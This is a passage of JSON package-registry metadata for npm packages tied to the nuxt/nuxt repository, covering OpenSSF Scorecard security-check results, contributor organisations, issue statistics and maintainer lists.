fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-05-08T03:50:13.580Z","dependent_packages_count":0,"downloads":14,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":22.40941024303714,"dependent_packages_count":32.301555319200475,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.35548278111881},"purl":"pkg:npm/%40depup/nuxt__kit","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@depup/nuxt__kit","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@depup/nuxt__kit","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@depup/nuxt__kit/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt__kit/codemeta","maintainers":[{"uuid":"chiefmikey","login":"chiefmikey","name":null,"email":"wolfemikl@gmail.com","url":null,"packages_count":2064,"html_url":"https://www.npmjs.com/~chiefmikey","role":null,"created_at":"2026-03-19T04:23:21.255Z","updated_at":"2026-03-19T04:23:21.255Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chiefmikey/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343193,"name":"@rsnuxt/builder","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":34,"first_release_published_at":"2025-02-11T09:14:57.487Z","latest_release_published_at":"2026-03-30T06:58:36.804Z","latest_release_number":"0.5.13","last_synced_at":"2026-05-11T01:23:05.977Z","created_at":"2025-02-11T09:37:12.682Z","updated_at":"2026-05-11T01:23:05.977Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/builder","install_command":"npm install @rsnuxt/builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.13"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:01.233Z","dependent_packages_count":0,"downloads":773,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/builder","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fbuilder/codemeta","maintainers":[{"uuid":"vince